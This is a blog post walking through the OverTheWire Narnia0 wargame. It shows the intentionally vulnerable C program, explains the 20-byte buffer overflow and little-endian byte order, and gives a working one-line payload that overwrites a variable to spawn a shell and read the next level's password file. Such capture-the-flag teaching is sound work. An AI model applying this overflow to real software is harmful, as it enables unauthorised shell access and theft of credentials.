---
layout: post
title:  "Narnia0"
tags: binary re narnia wargames
excerpt_separator: <!--more-->
---
In these series of posts I'm going to share my write-ups for the Narnia challenge of [WarGames](https://overthewire.org/wargames/).  
Enjoy! :) 
<!--more-->

So here is what narnia0.c contains:

	#include <stdio.h>
	#include <stdlib.h>

	int main(){
	    long val=0x41414141;
	    char buf[20];

	    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	    printf("Here is your chance: ");
	    scanf("%24s",&buf);

	    printf("buf: %s\n",buf);
	    printf("val: 0x%08x\n",val);

	    if(val==0xdeadbeef){
	        setreuid(geteuid(),geteuid());
	        system("/bin/sh");
	    }
	    else {
	        printf("WAY OFF!!!!\n");
	        exit(1);
	    }

	    return 0;
	}


Our job is to change the value of **val** from *0x41414141* into *deadbeef*, so then be able to get a shell with **narnia1** user access.  

The program asks us to enter a string with 24 bytes length.  
Now when the *main* function executes, it will free up space in stack for the local variables. Here val and buf.  
The address of the buf variable in stack is lower than val and it's been specified that buf is a 20 bytes size string. So the remaining 4 bytes will be written into val.  
All we have to do is to choose the first 20 bytes as whatever as we want and the next four bytes, deadbeef.

The trick is that processors we use store data in *little-endian* format. Meaning that the least significant byte goes into the smallest address.  
So our desired string should be something like this:  
	
	12345678901234567890efbeadde

Keep in mind that deadbeef is actually a hex value.  

We use **printf** for writing our string in proper format and **cat** for keeping shell open.  
Another trick here is to use a *subshell*. So the desired shell won't get closed. Using parentheses around the command we can do so.

	(printf "12345678901234567890\xef\xbe\xad\xde"; cat - ) | ./narnia0

Congrats! You got the shell, now you just need to use cat for viewing the narnia1 user password from **/narnia_pass/** directory.